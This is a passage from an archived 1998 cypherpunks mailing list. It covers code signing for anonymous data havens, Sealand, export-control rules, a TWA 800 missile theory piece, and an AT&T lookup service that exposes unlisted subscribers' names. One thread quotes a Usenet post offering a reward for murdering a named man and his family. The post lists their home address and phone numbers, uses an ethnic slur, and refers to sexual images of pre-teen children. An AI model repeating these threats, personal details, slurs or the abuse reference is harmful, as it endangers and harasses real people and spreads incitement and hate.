recipient desides they want to check the sign they have two choices:

 - select an anonymous key that has been previously stored on some sort of
   key server.

   (if they are running a eternity server blind they could be running a
    key server blind as well, it follows that at least some of the
    users of your software wanting to verify the signing will go to this
    server and hence have corrupted code, if we're using the usenet model
    this is even more likely since they could be running a feed point for
    other usenet feeds downstream and hence capture many if not all requests
    for the product, especialy if they were the only server to actualy
    carry a copy.)

 - contact you the author directly (I'm assuming of course you were silly
   enough to put a publicly available key directly traceable to yourself
   on it in the first place) in which case they simply intercede from a
   upstream tap and verify their request in your behalf.

In either case there is no guarantee that what comes off the server is
what you the source put on there. Hence the long term security of the key
is compromised. In particular, in the second case, since they already know
who provided the illicit data to the server there motive is clearly to
track the users. This breaks the anonymity of the data haven.

Implicit in a workable data haven model is the goal of both source and sink
anonymity. This means that any signed data on the server must provide a
mechanism for the user to verify the sign by access to a suitable key to
generate the appropriate hash and compare it to the one that the server
delivered. If they match you should have the correct unadulterated document.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Admin Pgh Plan <pghmain@pgh.org>
Date: Thu, 15 Jan 1998 17:19:19 +0800
To: freedom-knights@jetcafe.org
Subject: Re: Chris Lewis's death?
In-Reply-To: <34BDC364.46C2@alt.net>
Message-ID: <Pine.LNX.3.96.980115035741.23364E-100000@www3.localweb.com>
MIME-Version: 1.0
Content-Type: text/plain



Let us concentrate on getting Lewis fired
rather than killing him.  Killing Nortel
would be a much better idea.

On Thu, 15 Jan 1998, Dr. Zeus wrote:

> Date: Thu, 15 Jan 1998 03:05:56 -0500
> From: "Dr. Zeus" <zeus@alt.net>
> To: freedom-knights@jetcafe.org
> Cc: cypherpunks@toad.com, usenet@pgh.org
> Subject: Chris Lewis's death?
> 
> Anonymous wrote:
> > 
> > I tried sending an anonymous test article to comp.org.cauce via the CRACKER
> > remailer.  Sure enough, the Gypsie Jew Zorch forged a cancel for my article:
> > 
> > >From: scott@zorch.sf-bay.org (Scott Hazen Mueller)
> > >Newsgroups: comp.org.cauce
> > >Subject: cancelled posting
> > >Date: 30 Dec 1997 13:25:04 -0500
> > >Organization: At Home; Salida, CA
> > >Lines: 26
> > >Sender: johnl@iecc.com
> > >Approved: comp.org.cauce@abuse.net
> > >Message-ID: <EM0LFH.Bn3@zorch.SF-Bay.ORG>
> > >Reply-To: scott@zorch.sf-bay.org
> > >NNTP-Posting-Host: ivan.iecc.com
> > >X-submission-address: comp-org-cauce@abuse.net
> > >X-Authentication-Warning: orbit.hooked.net: Uzorch set sender to news@zorch.sf-bay.org using -f
> > >X-Nntp-Posting-Host: localhost.sf-bay.org
> > >Path: ...!iecc.com!iecc.com!not-for-mail
> > >
> > >I have issued a cancel for the following posting to comp.org.cauce.  Death
> > >threats are serious business.
> > >
> > >Xref: zorch comp.org.cauce:378
> > >Path: zorch!news.well.com!noos.hooked.net!204.156.128.20.MISMATCH!news1.best.com
> > >!news.maxwell.syr.edu!news-peer.sprintlink.net!news-sea-19.sprintlink.net!news-i
> > >n-west.sprintlink.net!news.sprintlink.net!Sprint!205.238.207.65!iecc.com!iecc.co
> > >m!not-for-mail
> > >From: Anonymous <anon@anon.efga.org>
> > >Newsgroups: comp.org.cauce
> > >Subject: CAUCE offers a $50,000 (canadian) reward for killing Chris Lewis, his w
> > >ife, and the kid
> > >Date: 30 Dec 1997 10:58:17 -0500
> > >Organization: I.E.C.C., Trumansburg NY
> > >Lines: 14
> > >Sender: johnl@iecc.com
> > >Approved: comp.org.cauce@abuse.net
> > >Message-ID: <b8d6450efb8581fa6190e92216c92e16@anon.efga.org>
> > >NNTP-Posting-Host: ivan.iecc.com
> > >X-submission-address: comp-org-cauce@abuse.net
> > >Comments: This message did not originate from the Sender address above.
> > >        It was remailed automatically by anonymizing remailer software.
> > >        Please report problems or inappropriate use to the
> > >        remailer administrator at <admin@anon.efga.org>.
> > 
> > My cancelled Usenet article offered a reward for killing the spammer:
> > 
> > >CAUCE, the enforcement branch of the Internet administration, is dedicated to
> > >exterminating all SPAMMERS by any means necessary. CAUCE wants Chris Lewis and
> > >all other SPAMMERS dead, and will gladly pay the $50,000 (canadian) reward to
> > >whomever KILLS Chris Lewis and his family, who reside in a suburb of Ottawa:
> > >
> 
> I think we should leave the family out of this, and instead killing
> Chris Lewis, just get him fired from Nortel
> 
> 
> > >483 Vances Side Road
> > >Dunrobin, Ontario K0A 1T0
> > >CANADA
> > >Home telephone: (613) 832-0541,
> > >Office telephone: (613) 763-2935
> > >
> > >After you kill Chris Lewis and his family, please see http://www.cauce.org
> > >for information on how to collect your CAUCE reward.
> > 
> > This is fucking censorship!  I'm putting the notice of the CAUCE reward on my
> > web home page at http://www.panix.com/~guy, right next to the pictures of the
> > pre-teen kids screwing.  Fuck you, Zorch, you're next after C, P, and G Lewis.
> > 
> > ---guy
> 
> Just6 who is this "guy?"
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mark@unicorn.com
Date: Thu, 15 Jan 1998 20:24:01 +0800
To: cypherpunks@cyberpass.net
Subject: Sealand (was Re: (eternity) autonomous agents)
Message-ID: <884866825.4040.193.133.230.33@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green wrote:

>Sealand, about which I wrote about on this list before, was an example 
>that should be studied by the offshore advocates. Based in an old 
>oilrig housing platform,

Victorian sea-fort, AFAIR.

>some unlucky investors attempted to establish 
>their own country. They began issuing stamps and passports for their 
>"country". As any reasonable person should have expected, nobody would 
>move their mail and nobody recognized their passports.

Which wasn't the point; the majority of those they sold were just
for fun, not serious attempts at being recognized. However, I noticed
a newspaper article over Christmas about a woman who's selling
professional-looking passports in the names of countries which no
longer exist or changed names; the intention, presumably, being
that immigration officials won't realise that the passports aren't
real.

>They went bankrupt.

I'd be interested to know where you got your information from, because
both Strauss ('How to start your own country') and the Micronations
Web page tell different stories; that Sealand was set up mostly for fun
by a couple of guys who made a lot of money from pirate radio and
it lasted at least fifteen years.

Of course this doesn't detract from the main point, which is
that you won't get away with offshore data-havens unless you are
able to defend them against invaders; Strauss claims Sealand was
invaded by some German businessmen at one point, and any such 
data-haven will soon be visited by cops or warships.

    Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Thu, 15 Jan 1998 18:26:51 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
Message-ID: <tw7zpkynioi.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:

> more than a fragment of one sentence...:(

> I'm assuming this has something to do with the eternity server/black_net
> discussion that has been going on. So I'll take a stab at it, not that it
> may make any sense in the actual context ...

Yes, you guessed right :)
> 
>  - You generate the code and sign it
> 
>  - You deliver the signed code to a data haven server of some architecture
>    (note that you don't know where it is or who runs it, I'll assume you
>     use some particular usenet newsgroup as your drop point)
> 
>  - Somebody else comes along and sees a list of available items and selects
>    yours (again through a usenet based request mechanism).
> 
>  - They receive the code signed with 'your' key and decide they want to
>    verify the signing (through yet another usenet channel).
> 
> The problem with this model is in the second step. What is to keep them
> from removing your signatory, moding the code, and then resigning it. If the
> recipient desides they want to check the sign they have two choices:

The problem reduces to one of distribution of public keys.  In my model
(er, actually Lenny Foner's model, in this case), you distribute something
that has intrinsic verifiability -- the eternity source.  So whether
or not rdl's eternity-dds signing key is compromised is irrelevant to
the users -- in fact, the assumption is that since I am a known target,
I've been killed or compromised.  So, there's this potentially untrusted
code out there.

People who have known public keys then inspect and sign the code.  It is
assumed these people have distributed their public keys far and wide, signed
by lots of people, etc.  As long as you can assume the "PGP web of trust",
the distributed software signing thing works.

I agree that the current state of PGP use is probably not enough for
the "PGP web of trust" -- I've *never* used a key and found it signed by
anyone I know.  However, I think even the current system puts a pretty high
barrier to fraud, and if there started to be fraud, people would start
signing each other's keys.

A keyserver serving keys like "rdl's eternity-dds release signing key" might
be subject to traffic analysis, true. However, as you suggest, you could
put the keyserver inside Eternity.  Then, the problem just gets shifted -- now
you need (a) pgp signing key(s) which has/have signed all of those keys.

I think it is unreasonable to think merely signing a key (and distributing
your own personal key securely) will be a felony before anything has been
done with that key.  More to the point, I think it is unreasonable to think
the government will go after people purely for signing the source code
to a piece of software -- signing does not imply you use it, does not imply
that you wrote it, does not imply anything other than that you've
looked at it, verified it, and signed it.  The government would do just
as well to track down the posters to cypherpunks and kill them.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 15 Jan 1998 20:00:43 +0800
To: cypherpunks@toad.com
Subject: BXA Wassenaar Rule
Message-ID: <1.5.4.32.19980115115610.0109ab8c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



BXA published today its interim rule for implementing the 
Wassenaar Arrangement:

   http://jya.com/bxa-wa-rule.txt  (354K)

Or compressed, self-extracting Zip:

   http://jya.com/bxa-wa-rule.exe  (80K)

----------

Federal Register, 15 January 1998

[Excerpt]

[[Page 2452]]

Bureau of Export Administration

_______________________________________________________________________

15 CFR Parts 732, 740, 742, 743, 744, 746, 762, and 774

Implementation of the Wassenaar Arrangement List of Dual-Use Items:
Revisions to the Commerce Control List and Reporting Under the
Wassenaar Arrangement; Rule

DEPARTMENT OF COMMERCE

Bureau of Export Administration

15 CFR Parts 732, 740, 742, 743, 744, 746, 762, and 774

[Docket No. 971006239-7239-01]
RIN 0694-AB35

Implementation of the Wassenaar Arrangement List of Dual-Use
Items: Revisions to the Commerce Control List and Reporting Under the
Wassenaar Arrangement

AGENCY: Bureau of Export Administration, Commerce.

ACTION: Interim rule with request for comments.

-----------------------------------------------------------------------

SUMMARY: Representatives of thirty-three countries gave final approval
July 12-13, 1996 in Vienna, Austria to establish the Wassenaar
Arrangement on Export Controls for Conventional Arms and Dual-Use Goods
and Technologies. The thirty-three countries agreed to control all
items in the List of Dual-Use Goods and Technologies with the objective
of preventing unauthorized transfers. They further agreed on a target
date of November 1, 1996, for implementation of the Wassenaar Lists.

    The purpose of this interim rule is to make the changes to the
Commerce Control List necessary to implement the Wassenaar List. In
addition, this interim rule imposes new reporting requirements on
persons that export certain items controlled under the Wassenaar
Arrangement to non-member countries in order to fulfill the information
exchange requirements of the Wassenaar Arrangement. The Department of
Commerce, with other concerned agencies, is reviewing the Export
Administration Regulations to determine whether further changes will be
required to implement the information sharing provisions of the
Wassenaar Arrangement and to make the necessary adjustments to existing
country groups.

    This rule also revises part 740 of the EAR by removing License
Exception availability for certain items controlled for missile
technology reasons.

    Although the Export Administration Act (EAA) expired on August 20,
1994, the President invoked the International Emergency Economic Powers
Act and continued in effect, to the extent permitted by law, the
provisions of the EAA and the EAR in Executive Order 12924 of August
19, 1994, as extended by the President's notices of August 15, 1995,
August 14, 1996 and August 15, 1997.

DATES: This rule is effective January 15, 1998. Comments on this rule
must be received on or before February 17, 1998.

ADDRESSES: Written comments should be sent to Patricia Muldonian,
Regulatory Policy Division, Bureau of Export Administration, Department
of Commerce, P.O. Box 273, Washington, DC 20044.

FOR FURTHER INFORMATION CONTACT: James Lewis, Director, Office of
Strategic Trade and Foreign Policy Controls, Bureau of Export
Administration, Telephone: (202) 482-0092.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 15 Jan 1998 22:40:50 +0800
To: napa@tmn.com
Subject: Joe Bress
Message-ID: <34BE198B.7852@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Thursday 1/15/98 6:54 AM

Ray Sumser
Arnold Intrater
Jennifer Lipnick
National Academy of Public Administration
955 L'Enfant Plaza, North SW
Washington, DC 20074
202-651-8062
    393-0993 FAX

Former NAPA employee and lawyer Joe Bress' words, 
"Win or lose,"  to me spoke in your presence in 
ABQ caused some additional whistleblowing on Internet.  

A cypherpunk, I am guessing.
  
I stayed off Internet for one year so as to
be above suspicious.

The attached letter to judge Edwards was mailed July 16, 1996.  
And received July 18, 1996.

  Moorer and other retired Navy brass, at a news conference, expressed   
  grave suspicion over the FBI's recently concluded 18-month
  investigation of the disaster, in which the plane disintegrated 
  July   17, 1996, en route to Paris and plunged into the Atlantic near
Long
  Island, killing 230. They said a military missile explosion just   
  outside the 747's forward cabin seems the likely cause. 

While the timing of my letter to Edwards was merely coincidence, 
I am concerned that whistleblowing may constitute a danger to public
safety. 

Please help to get this matter settled.

Thanks
bill

Title: Navy Brass Revive Missile Theory




 [Email Reply] 



Retired Navy Brass Revives Twa Missile Theory
Officers Voice Suspicions Over Fbi's Findings

By John Hanchette and Billy House

Adm. Thomas H. Moorer, former chairman of the Joint Chiefs
of Staff, on Jan. 8 called for new congressional hearings into
last July's crash of TWA Flight 800.

"It absolutely deserves more investigation -- a lot more,"
Moorer told Gannett News Service. "This time, I wouldn't let
the FBI do it. I'd have the NTSB (National Transportation
Safety Board) do it. I think Congress certainly should get more
answers from the FBI."

Moorer and other retired Navy brass, at a news conference,
expressed grave suspicion over the FBI's recently concluded
18-month investigation of the disaster, in which the plane
disintegrated July 17, 1996, en route to Paris and plunged into
the Atlantic near Long Island, killing 230. They said a military
missile explosion just outside the 747's forward cabin seems
the likely cause.

"All evidence would point to a missile," Moorer said. "All those
witnesses who saw a streak that hit the airplane -- you have to
assume it's a missile. In an investigation like this, you can't
overlook anything."

Moorer, an expert on missile weaponry, attended the news
conference convened by a media critic group that scoffs at the
official NTSB and FBI findings unveiled a month ago.
Joseph Valiquette, FBI spokesman in New York, said the
agency is "comfortable" with its conclusions that "there's no
evidence a criminal act was responsible."

'A train wreck in the sky'

The Navy officers -- who appeared with a veteran TWA pilot,
two witnesses and members of Accuracy in Media, which
coordinated the briefing -- said a new study of evidence from
recovered Flight 800 data recorders rebuts the government's
official story about fuel vapors exploding in a central tank of the
jetliner after a spark from unknown causes.

"This is either a train wreck in the sky, or an explosive device
-- mid-air, outside the plane," said retired Navy Cmdr. William
Donaldson, who flew 89 combat missions over Vietnam and
for five years was a top Naval aviation accident investigator.

Donaldson, who said he is not working for TWA or the
passenger jet's manufacturer, Boeing, examined the mountain of
material released in early December about the $100 million
federal investigation. He particularly criticized one NTSB
document reflecting flight-recorder data that was not discussed
when the material was unveiled in Baltimore last month.

Donaldson noted a line drawn through readings of the last five
seconds of the doomed jet's flight, with a handwritten margin
note reading "End of Flt. 800 DATA" -- except there are more
revealing readings below it.

He said he thinks this was an attempt to divert attention from
the final readings on the flight recorder: "The only reason you
put flight data recorders into an airplane at millions of dollars
cost is to capture this last data line."

He said NTSB officials later tried to convince the Navy
dissidents it merely was transcript from an earlier flight -- a
conclusion former TWA pilot Howard Mann said is "not
possible -- it's erased -- there's just no way."

The final readings show chaos in the sky -- with airspeed
dropping instantly by almost 200 knots, the pitch angle jumping
five degrees, altitude dropping 3,600 feet in about three
seconds, the roll angle going from zero to 144 degrees (the
plane almost inverted), and magnetic heading changing from 82
degrees to 163 degrees.

The small vane that measures wind angle striking the nose --
situated on the left forward fuselage -- goes from 3 degrees to
106 degrees back to 30 degrees.

Donaldson said all these indicate an extremely high-pressure
wave coming from the lower left side of the plane's front. The
measurements "indicate there was an explosion -- a big
explosion -- outside the cockpit." Mann agreed with
Donaldson's interpretations.

Donaldson also said:

* Divers found debris from the forward fuselage as much as
2,900 feet to the right of the extended flight path, suggesting it
may have been propelled by an explosion from the plane's left.

* Fuselage doors from near the front of the craft, later
recovered, were bent and dented inward.

* Subsequent tests Donaldson conducted showed fuel vapor in
the empty center tank would not have been flammable enough
to cause such an explosion, and there was nothing to ignite it.

* More damage occurred to the left wing than the right.

* The fuselage skin broke up in such a way as to suggest a
pressure wave from the outside left front.

"What you're looking at is the product of an explosion in the
sky that totally destroyed the aircraft's ability to fly anywhere,"
he said.

A digital animation computer rendering of the catastrophe --
prepared by the CIA for media use in early December --
sought to explain some of the physical forces on the flight data
by showing the nose breaking off the huge aircraft and the body
then climbing almost 3,000 feet before a huge petroleum
explosion sends it fireballing into the sea.

"There couldn't have been an aviator at CIA who had anything
to do with that," said Donaldson. "They were laughed out of
town by pilots."

Eyewitness accounts

Two witnesses from Long Island -- lawyer Frederick Meyer
and furniture maker Richard Goss -- described what looked
like a missile contrail rising upward in the sky before the TWA
explosion.

Goss said the FBI was interested and "very amazed," but later
"there wasn't as much enthusiasm . . . I never heard from them
again."

Meyer, a helicopter pilot in Vietnam, was flying an Air National
Guard helicopter on maneuvers when the disaster occurred in
front of him: "I saw, what I swear to God, was military
ordnance explode."

Meyer said, "The aircraft I saw came out of the air like a stone.
Nobody saw that aircraft climb a foot after it was hit. The CIA
cartoon bears no similarity to what I saw."

Meyer approached the FBI with his report, but said after two
desultory interviews, agents never called back. He claims he
knows several witnesses who called the FBI's 800 number with
similar reports, but were not called back.

The FBI, Donaldson said, "is holding the lid on 92 witnesses
who allege they saw something go and climb to the sky. Most
of those people are scared to death right now."

Valiquette, the FBI spokesman, said, "We know there are
always going to be people who will never accept our findings.
And we're comfortable with that, too. . . . We went back and
re-interviewed all those eyewitnesses. We plotted their
positions, and there was a lot of analysis done. Today, we are
comfortable with the results."

The retired officers speculated a missile could have come from
either a submarine or a buoy device developed by the Navy
years ago to float attack missiles into position for launch from
miles away.

"One vital question we haven't attacked is the origin of that
streak of light," Moorer said. "Where did it come from? Who
fired it."

For its part, the NTSB insisted after the briefing that "We have
no physical evidence that a missile impacted TWA 800, or a
fragment of a missile penetrated the aircraft."

Navy Times, Jan. 19, 1998, Page 14

Posted here Jan. 15, 1998 
Web Page: http://www.aci.net/kalliste/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 15 Jan 1998 22:30:51 +0800
To: cypherpunks@cyberpass.net
Subject: AT&T Database Reveals Unlisted Names From Numbers
Message-ID: <v04003949b0e3c3058bd9@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



Yet another reason for cash settled IP telephony?

Actually, you can trace an IP address just as well, can't you?...

Cheers,
Bob Hettinga

--- begin forwarded text


Resent-Date: Wed, 14 Jan 1998 19:06:14 -0800 (PST)
X-Authentication-Warning: weber.ucsd.edu: procmail set sender to
rre-request@weber.ucsd.edu using -f
X-Authentication-Warning: weber.ucsd.edu: Processed from queue
/usr/spool/mqueue/rqueue
Date: Wed, 14 Jan 1998 18:58:10 -0800 (PST)
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: AT&T Database Reveals Unlisted Names From Numbers
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-URL: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/1803
X-Loop: rre@weber.ucsd.edu
Precedence: list
Resent-Sender: rre-request@weber.ucsd.edu


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 14 Jan 98 12:38 PST
From: privacy@vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V07 #02

PRIVACY Forum Digest      Wednesday, 14 January 1998      Volume 07 : Issue 02

----------------------------------------------------------------------

Date:    Tue, 13 Jan 98 10:05 PST
From:    lauren@vortex.com (Lauren Weinstein; PRIVACY Forum Moderator)
Subject: AT&T Database Reveals Unlisted Names From Numbers

Greetings.  In a memorable scene from the 1975 film "Three Days of the
Condor," CIA agent-on-the-run Joe Turner, played by Robert Redford, monitors
a phone line with a telephone test set (known in telco parlance as a "butt
set" or more popularly a "butt-in").  After taping and determining the touch-
tone digits being dialed, he makes a call to an "operator" who provides the
name and address of the party associated with that dialed number.

His exchange with that operator was completely authentic.  For decades
telephone companies have operated "Customer Name and Address" bureaus, known
colloquially as "CNA" bureaus.  Presented with a phone number, the CNA
operators provide name and address data, even for unlisted or non-published
numbers.  This service was and is ostensibly only for telephone company
use.  The telcos rightly considered this information sensitive, and CNA
access numbers were always subject to frequent changing, but still leaked
out.  They were highly coveted by private detectives, phone phreaks, and
others, for various investigative or even harassing purposes (few things can
upset a person who thinks they have an unlisted number more than a bizarre
call from an unknown person in the dead of night who knows their name...)

Over the years, telephone subscribers have become more aware of the various
commercial and other purposes to which their telephone listings have been
subjected, and increasing percentages of folks have unlisted
("non-published" or "non-pub") numbers.  In states like California, the
majority of numbers are non-pub.  Telephone company literature usually
states that a non-pub status (for which subscribers now typically have to
pay an extra monthly fee) also protects them from so-called "upside-down"
listings and services--essentially published versions of CNA that provide
listings in telephone number and/or house address order.  Clearly the telcos
realize that people are still very sensitive about their names and/or
addresses being looked up by number.

So it was with considerable concern late last year when I learned of an
easily accessible AT&T database that provides a major portion of CNA--the
provision of names from numbers, even for unlisted or non-published numbers.
I have been engaged in a dialogue with various AT&T officials concerning this
database since then.  Getting an official response has taken some time (the
holidays didn't help of course), and I've been told that I'm the first
person to ever bring this issue to their attention (a familiar enough
refrain when it comes to privacy issues...)

The database in question is a "service" (which AT&T says is greatly
appreciated by their customers) which ostensibly exists to allow automated
access to number information by business customers.  AT&T long distance
business customers, upon calling their designated customer service number
from their bills, enter a typical complex voice mail maze.  After entering
their main AT&T account number into the system, one of the choices available
relates to "if you do not recognize a number on your bill."  Choosing this
option drops the user into an automated system which allows the direct
entering of phone numbers.

For each number entered, the system then attempts to read out (using a voice
synthesizer) the name associated with that number.  An option is also
available to spell out the name, since text-to-speech handling of proper
names can be less than optimal (remind me to tell the story of my
"Touch-Tone Unix" synthesizer system from the '70's someday).  The number
entry/readout sequence can be repeated (apparently) as many times as desired.

The need for a customer to find out who is associated with a truly unknown
number on their bill can be a real one.  Unfortunately, this database has a
variety of negative characteristics:

-- The database does not limit lookups to numbers actually on the customer's
   bill!  Any numbers can be entered, and the system will usually provide the
   associated name, even if they are not on the current (or any) bill.
   Presence or absence from the bill is totally irrelevant.

-- The database provides data for unlisted or non-published numbers
   just as happily as for listed numbers.  This includes corporate
   internal numbers, modem and fax lines, residential second lines,
   and so on.

-- For listed numbers, the database sometimes provides not the name
   associated with the listing, but rather the name of the *person* who is
   apparently the "billing contact" for the listed entity and usually has
   nothing whatever to do with the listing itself!

To quote from the official response I received from the AT&T media relations
representative with whom I have been in contact about these concerns:

      "As a matter of policy, AT&T safeguards customer information from
       unauthorized access.  It is also our policy to allow business
       customers to access their account-billing records to check the
       accuracy of their records and to request changes, as necessary, by
       using an automated system.  Until now, questions such as yours have
       never come up, so we want to thank you very much for bringing your
       concerns to our attention.

       ...

       The system has been in use for several years and, in our
       search for ways to improve the accuracy, timeliness and cost-
       effectiveness of the services we offer customers, we had
       already begun evaluating a number of options.

       Your inquiry has hastened our considerations of new ways
       to offer capabilities that our business customers value while
       safeguarding private customer information from unauthorized
       access. So, again, we thank you for bringing this issue to our
       attention."

What this really means in terms of actual changes is decidedly unclear.  No
date is specified for any alterations, nor have they explained in any manner
what sorts of customer privacy changes (if any) will be made, nor how any
new system might differ from the current one.

In the meantime, I have been told that they do not intend to alter the
operations of the current database in any manner.  I have suggested
suspending or limiting the current system as a clear move to help protect
telephone subscribers' privacy.  AT&T has chosen not to do so.  They point
out that the database is not "intended" for other than the lookup of unknown
numbers on the bills, and that they consider any other use to be improper.
However, such improper uses will continue to be completely possible under
the current system.

My overall impression is that AT&T feels people aren't concerned about number
to name lookups, and that AT&T doesn't see what harm such information could
do in any case.  This sort of "What harm could it do?" attitude is one that
PRIVACY Forum readers have seen repeatedly with commercial databases of
various sorts.  It of course is important that persons make their feelings
about such issues known once they come to light.  If people don't bother
to complain, faulting the commercial database policies themselves becomes
considerably more problematical.

Others may agree, or perhaps disagree, with AT&T's apparent attitudes about
this matter.  It seems likely that more persons expressing their opinion,
either positive or negative about the system, would be useful to AT&T in
helping to gauge public feelings about such matters.  AT&T has told me
specifically that the appropriate venue for such opinions would be AT&T
Executive Resolution, at (908) 221-4191 (8-5 PM Eastern--I'm told that
collect calls are accepted during those business hours).

All too often, we see that the implementation of potentially useful services
is done in a manner that produces undesirable (and often unintended)
negative privacy side-effects.  A key issue is to what extent an entity
responds to privacy concerns, even when they might not agree with them,
after they've been made aware of the issues.  So far, I'm afraid that AT&T's
response to this situation has not been stellar.

--Lauren--
Lauren Weinstein
Moderator, PRIVACY Forum
http://www.vortex.com

------------------------------

End of PRIVACY Forum Digest 07.02
************************

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 16 Jan 1998 09:14:48 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: USPS loosing business to email  [CNN]
In-Reply-To: <199801130133.TAA24345@einstein.ssz.com>
Message-ID: <3.0.5.32.19980115092303.008c5670@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



It's especially a problem for them because email is replacing a lot
of Express Mail, Fedex, and similar higher-priced services,
so profits get hit harder.  

The phone companies are having the same problem - while voice over
the Internet isn't making much of a dent, expensive international calling
has a lot of fax traffic that's easy to turn into email.
And the Web is replacing a lot of 800-number calling
for information services from companies, which are also
a higher-profit part of the business.

At 07:33 PM 1/12/98 -0600, Jim Choate wrote:
>Forwarded message:
>>                U.S. POSTAL SERVICE LOSING BUSINESS TO COMPUTERS
>>                                        
>>      e-mail vs. snail mail January 12, 1998
>>      Web posted at: 3:25 p.m. EST (2025 GMT)
>>      
>>      NEW YORK (CNN) -- The U.S. Postal Service is facing stiff
>>      competition from computers, according to an article in the January
>>      19 issue of Time Magazine.
>>      
>>      Electronic mail could replace 25 percent of conventional mail, or
>>      "snail mail," by the year 2000, the article said.
>>      
>>      The Postal Service lags behind Federal Express and United Parcel
>>      Service in shipping packages. The latter already moves 80 percent of
>>      the country's packages, according to the article.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 16 Jan 1998 09:14:37 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: What it means to be in America...
In-Reply-To: <199801131731.LAA27730@einstein.ssz.com>
Message-ID: <3.0.5.32.19980115093003.008c5670@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



This isn't really the list for that sort of thing.
While Rand is partially correct, the big industrialization of the US
came from the railroad business opening the West, which depended
on killing off the Indians who lived there - in large part by
wiping out the buffalo herds and starving the people,
and by using the US Army to kill them, and granting large
chunks of the land to the railroads, not only enough right of
way for tracks, but typically several miles on each side.
Here in Northern California, the Gold Rush was simplified by
killing off the local tribes in gold country.

And much of the early industrialization in New England was
cotton mills, processing slave-grown cotton.



At 11:31 AM 1/13/98 -0600, Jim Choate wrote:
>
>    America's abundance was created not by public sacrifices to "the
>    common good," but by the productive genius of free men who pursued
>    their own personal interests and the making of their own private
>    fortunes. They did not starve the people to pay for America's
>    industrialization. They gave the people better jobs, higher wages, and
>    cheaper goods with every new machine they invented, with every
>    scientific discovery or technological advance- and thus the whole
>    country was moving forward and profiting, not suffering, every step of
>    the way.
>
>    - Ayn Rand
>    
>    
>    
>    In the United States the majority undertakes to supply a multitude of
>    ready-made opinions for the use of individuals, who are thus relieved
>    from the necessity of forming opinions of their own.
>
>    - Alexis de Tocqueville
>
>
>    ____________________________________________________________________
>   |                                                                    |
>   |      Those who make peaceful revolution impossible will make       |
>   |      violent revolution inevitable.                                |
>   |                                                                    |
>   |                                          John F. Kennedy           |
>   |                                                                    |
>   |                                                                    | 
>   |            _____                             The Armadillo Group   |
>   |         ,::////;::-.                           Austin, Tx. USA     |
>   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
>   |      .',  ||||    `/( e\                                           |
>   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
>   |                                                 ravage@ssz.com     |
>   |                                                  512-451-7087      |
>   |____________________________________________________________________|
>
>
>
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 15 Jan 1998 23:19:34 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for coercion (fwd)
